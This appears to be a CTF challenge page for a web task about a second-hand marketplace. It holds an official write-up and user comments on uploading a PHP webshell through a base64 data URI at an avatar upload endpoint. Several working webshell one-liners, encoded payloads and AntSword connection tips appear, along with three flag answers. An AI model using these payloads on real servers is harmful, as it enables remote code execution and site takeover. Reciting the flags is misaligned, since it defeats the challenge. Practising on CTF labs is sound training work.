列表

详情


xxx二手交易市场

平台   WEB   已通过

题目作者: Aman

一  血: ‌‌‌‌‌dotast

一血奖励: 5金币

解  决: 2028

提  示:

描  述: 本人现实碰到的题目,无提示勿问

站长题解:

以base64编码方式上传webshell,

POST /user/upload

payload

image=data:image/php;base64,PD9waHAgZXZhbCgkX1BPU1RbJzEyMyddKTs/Pg==

连接后查看/var/www/html/flag

去做题

BlueL1ght @ 2024-03-07 23:20:45 👍0

<?php echo `$_POST[a]`;?>


Daniel2023 @ 2024-03-07 23:20:45 👍0

<?php @eval($_POST['abc']);?> 上传data参数: data%3Aimage%2Fphp%3Bbase64%2C%2F9j%2FPD9waHAgQGV2YWwoJF9QT1NUWydhYmMnXSk7Pz4=


vchopin @ 2023-12-07 23:20:45 👍0

base64最后结尾要= 不然bp显示php syntax error,蚁剑连不上


XRain @ 2023-10-07 23:20:45 👍0

实战题才好玩,各种黑盒测试,我看到 data://image/jpeg 和保存的图片文件名后缀 jpeg,就猜想这两个 jpeg 是不是有关联,一测发现果然有。


不会编程的崽 @ 2023-10-07 23:20:45 👍0

我不理解,POST['a'],死活连不上,POST['attack']就可以。。。。。


三碗不过杠 @ 2023-10-07 23:20:45 👍1

flag{fd71260e4d41df49807229647056e7dd} 头像处文件上传,抓包base64编码写入一句话木马,上传蚁剑链接,重点就是改php,base


冯飞99 @ 2023-07-07 23:20:45 👍1

这种实战题才是最爽的 flag{50352c0c4604ee60638e2579cbe3e141}


wxy1343 @ 2023-06-07 23:20:45 👍0

flag{412d5e0844a33f36c9aa3d688425fb9f}


ctfliu @ 2023-06-07 23:20:45 👍0

image=data%3Aimage%2Fphp%3Bbase64%2CPD9waHAgQGV2YWwoJF9QT1NUWydkYWRhZGYnXSk7Pz4= 密码dadadf 一剑连接返回的地址。在shell中用find / -name flag /var/www/html/flag


五无心惘然 @ 2023-06-07 23:20:45 👍0

别用菜刀,连半天连不上,换蚁剑就可以,语句是<?php @eval($_POST['attack']);?>,没什么要注意的,bash64编码最后不是‘=’的换个链接密码就好了